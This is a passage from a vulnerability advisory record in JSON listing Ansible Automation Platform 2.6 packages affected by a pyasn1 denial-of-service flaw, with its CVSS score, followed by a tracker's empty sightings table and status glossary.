"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.7-1.el9ap.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools+server-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python-tox-ansible-0:26.7.1-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3-tox-ansible-0:26.7.1-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools+server-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python-tox-ansible-0:26.7.1-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python3-tox-ansible-0:26.7.1-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.7-1.el10ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools+server-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.15-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-cli-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-tox-ansible-0:26.7.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-tox-ansible-0:26.7.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools+server-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-cli-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-server-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-ui-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.11-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-event-stream-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-worker-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-config-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-server-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-daphne-0:4.2.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-daphne-0:4.2.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+activitystream-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+api_documentation-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+authentication-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+channel_auth-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+feature_flags-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+jwt_consumer-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+oauth2_provider-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rbac-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+redis_client-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+resource_registry-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rest_filters-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.66-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.66-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pyasn1-0:0.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pyasn1-0:0.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-tox-ansible-0:26.7.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-tox-ansible-0:26.7.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.7-1.el9ap.noarch"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "pyasn1: pyasn1: Denial of Service via crafted ASN.1 REAL values"
}
]
}
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.